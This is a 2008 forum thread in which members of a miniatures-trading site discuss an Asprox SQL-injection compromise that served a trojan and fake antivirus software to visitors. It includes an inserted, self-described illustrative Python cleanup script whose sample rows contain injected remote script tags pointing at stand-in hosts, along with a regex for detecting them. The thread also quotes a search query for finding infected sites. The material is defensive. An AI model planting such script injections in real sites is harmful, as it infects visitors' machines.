Forum Admin Host Sergeant
603 Posts
09/09/2008 2:22 PM

I usually use firefox but I noticed last night that maxminis was not loading in IE. Looking closer, we were hacked again. In the past month, maxminis has had more than 47,000 hack attempts; apparently one succeeded. I updated the code to close the hole that I think the new attack is using. Please post here if you notice any more hack issues. Thanks!
relientKitten Warrior
179 Posts
Portland, Oregon
09/09/2008 3:10 PM

Anyone who was using IE last night during this and does NOT have up-to-date AntiVirus software, please update and run it. The script was loading a fake spyware combined with at least one trojan (and believe me, it loaded quick on testing). The 'spyware' is called AntivirXP08; the trojan was just detected as a generic when caught by McAfee. AnarionZelle states that Norton picked it up as trojan.asprox which will turn your box into a proxy server for other malicious traffic.
Glad we're back up and running. Host++

~relientKitten, Champion of Elenriel Annanole, Loremistress >^..^< Happy Customers: 17 Completed Trades: 22 Crochet Beholder: http://www.maxminis.com/Forums/tabid/104/forumid/68/postid/810379/view/topic/Default.aspx Crochet Dice: http://www.maxminis.com/Forums/tabid/104/forumid/68/postid/807807/view/topic/Default.aspx My trades, references, and flavrs: http://www.maxminis.com/Forums/tabid/104/forumid/53/postid/808880/view/topic/Default.aspx My can-has-want-plz-trade list: http://www.maxminis.com/hw_list.asp user=relientKitten
E Thug of the Round Table Wolfgang Warlord
5757 Posts
Milton, Ontario Canada
09/09/2008 3:19 PM

Thanks Host, you're awesome!!!!

Proud member since March 26 2005. Champion of the SIVAK DRACONIAN. Completed trades: (86) Bad traders (2): DJchuckles, sardal. Called shots: Sivak Draconian in DD. Trade References. Email Me
relientKitten Warrior
179 Posts
Portland, Oregon
09/09/2008 3:54 PM

Anarion++ for providing me with the info from Norton, I think I've put all of the pieces together.

Asprox is a botnet, converting infected machines into proxy servers that can then be used to redirect malicious traffic across the internet.

According to the original information from March when this botnet became high-scale, the folks behind Asprox began exploiting ASP (what MaxMinis happens to run on) in order to get their trojans into the mainstream.

They'll search Google for websites with ASP that match certain keywords and will then attack with the SQL Injection on those sites. This injection inserts a script block that runs a piece of javascript on another server. The particular javascript that we were subjected to had two functions. First, it checked to see if you had already been infected with a particular piece of spyware known as AntivirXP08. If you were, their work was already done and it stopped. Second, if you were not infected, it created a set of iframes that would then load a cgi script from the same server that the javascript came from. I didn't have the ability to get the cgi info, but my guess is that it redirected to another site that loaded the Asprox trojan (which is what the antivirus software was catching) and also loaded the AntivirXP08 so that it would not have to load the virii again (why have extra load on your infecting server). I noticed a couple of different domains that it was continuously trying to load from, so there could have been a number of different virii.

http://www.scmagazineus.com/Asprox-botnet-malware-morphs/article/110169/
http://www.firestorm-online.com/trojans/asprox/

This might be useful for you, Host, regarding vulnerability searches in the ASP code (under Suggested Actions): http://www.microsoft.com/technet/security/advisory/954462.mspx

I did the suggested Google search for finding infected sites... ("script src=http://*/""ngg.js"|"js.js"|"b.js") and there are at least 180k hits so we are certainly not the only ones that got smooshed.
~relientKitten, Champion of Elenriel Annanole, Loremistress >^..^< Happy Customers: 17 Completed Trades: 22 Crochet Beholder: http://www.maxminis.com/Forums/tabid/104/forumid/68/postid/810379/view/topic/Default.aspx Crochet Dice: http://www.maxminis.com/Forums/tabid/104/forumid/68/postid/807807/view/topic/Default.aspx My trades, references, and flavrs: http://www.maxminis.com/Forums/tabid/104/forumid/53/postid/808880/view/topic/Default.aspx My can-has-want-plz-trade list: http://www.maxminis.com/hw_list.asp user=relientKitten
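The post above describes the mechanics of the Asprox-style attack: a SQL injection that appends an externally sourced script block to text fields in the site's database, so that every page rendering those fields loads the attacker's javascript. The example below is an added illustration for the site-owner side of that problem and is not code from this thread or from maxminis. It assumes an in-memory SQLite database with constructed sample rows (a real ASP site would run a different database, and the scan loop would be adapted to its catalog views); it walks every text column of every table, reports rows carrying an injected `<script src=...>` tag together with the domains referenced, and strips those blocks in place so a cleanup can be audited before being applied to live data.

```python
import re
import sqlite3
from urllib.parse import urlparse

# An externally sourced <script> tag: the shape of block the post above
# describes being inserted into text fields. The src URL is captured.
SCRIPT_TAG = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(https?://[^\s"\'>]+)["\']?[^>]*>\s*</script>',
    re.IGNORECASE,
)


def find_injected_scripts(text):
    """Return the URLs of every external <script src=...></script> block in text."""
    if text is None:
        return []
    return SCRIPT_TAG.findall(text)


def strip_injected_scripts(text):
    """Return text with every external script block removed, other markup untouched."""
    return SCRIPT_TAG.sub("", text)


def text_columns(conn):
    """Yield (table, column) for every text-typed column in every user table.

    Identifiers come from the database schema, not from user input, so
    quoting them into the query string here is safe; values never are.
    """
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if (ctype or "").upper() in ("TEXT", "VARCHAR", "NVARCHAR", "NTEXT"):
                yield table, name


def scan_database(conn):
    """Return [(table, column, rowid, sorted domains)] for rows carrying an injected script."""
    findings = []
    for table, column in text_columns(conn):
        for rowid, value in conn.execute(f'SELECT rowid, "{column}" FROM "{table}"'):
            urls = find_injected_scripts(value)
            if urls:
                domains = sorted({urlparse(u).hostname for u in urls})
                findings.append((table, column, rowid, domains))
    return findings


def clean_database(conn):
    """Strip injected script blocks from every flagged row; return rows rewritten."""
    rewritten = 0
    for table, column, rowid, _domains in scan_database(conn):
        (value,) = conn.execute(
            f'SELECT "{column}" FROM "{table}" WHERE rowid=?', (rowid,)).fetchone()
        conn.execute(
            f'UPDATE "{table}" SET "{column}"=? WHERE rowid=?',
            (strip_injected_scripts(value), rowid))
        rewritten += 1
    conn.commit()
    return rewritten


def build_sample_db():
    """In-memory database with constructed rows (not real maxminis data).

    Two rows carry an injected script pointing at hypothetical hosts under the
    reserved .invalid TLD; one row has harmless markup to show it is left alone.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE have_want (item TEXT, note TEXT, qty INTEGER)")
    conn.executemany("INSERT INTO have_want VALUES (?, ?, ?)", [
        ("Crochet Beholder", "three available", 3),
        ("Sivak Draconian<script src=http://bad-host.invalid/ngg.js></script>", "want", 1),
        ("Dice bag", 'mint<script src="http://other-host.invalid/js.js"></script>', 2),
        ("Plain entry", "has <b>bold</b> markup but no script", 5),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for table, column, rowid, domains in scan_database(db):
        print(f"{table}.{column} rowid={rowid} loads from {', '.join(domains)}")
    print(f"rows cleaned: {clean_database(db)}")
    print(f"remaining findings: {scan_database(db)}")
```

The domain list is the part worth keeping from a scan like this: it is what you block at the proxy, search server logs for, and hand to users who were browsing the site while the injected block was live. Cleaning the rows removes the payload but not the injection point; the hole in the application code that accepted the injection in the first place still has to be closed separately, which is what the advisory linked above addresses.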
Vrecknidj Warlord
10445 Posts
United States
09/09/2008 4:07 PM

Thanks everyone. Thanks to Host for taking care of this, thanks to relientKitten for emailing me, and thanks to others who emailed me as well.
Nice to see we're up and running again.
Dave

Knowledge Arcana editor issues 5-9, Phoenix Lore Magazine editor, assistant editor for Rite Publishing; My Trade Thread and My Reference Thread; Winner of WBC IV, IX and XIII; Rule #0: bshugg is always right!
Sirohk Commander
3930 Posts
USA
09/10/2008 3:35 AM

Thanks.
Just a note - the excel button on the Have / Want list is not working since the hack. It gives an error when I try to save my H/W list.
Thanks.

Sirohk, the Bard of Heartstone, Knight of the Rahshasa's, and Crusader of the Zakya, Ak'chazar, Naztharune, and Naityan Rakshasa's
Forum Admin Host Sergeant
603 Posts
09/10/2008 1:29 PM

We were down again for about an hour today. I took the have/want lists offline temporarily to see if they are the hole...
NITRAM Skirmisher
8 Posts
Canada
09/15/2008 5:53 PM

Sorry to ask, but are the have/want lists still down, or is it just my browser? :-)

At last we will reveal ourselves to the Jedi, at last we will have revenge (Darth Maul, Ep1)
realmaster Underboss
2010 Posts
Home of the 2002 Winter Olympics
09/16/2008 10:13 PM

Posted By NITRAM on 09/15/2008 5:53 PM: sorry to ask but, the have/want lists are still down or is it just my browser :-)

Still down. :(

Thanks, realmaster. Let's split up!!!!!
RIP Gary Gygax 1938-2008
Unhallowed vindicated champion: van richten. Successful trades: 72. Trades in progress: 0. Have issues with: 1 (burning_kazuki). Bad trades: 0
sonofrich Skirmisher
10 Posts
York, Pa
09/17/2008 6:40 PM

Any idea when this will be fixed?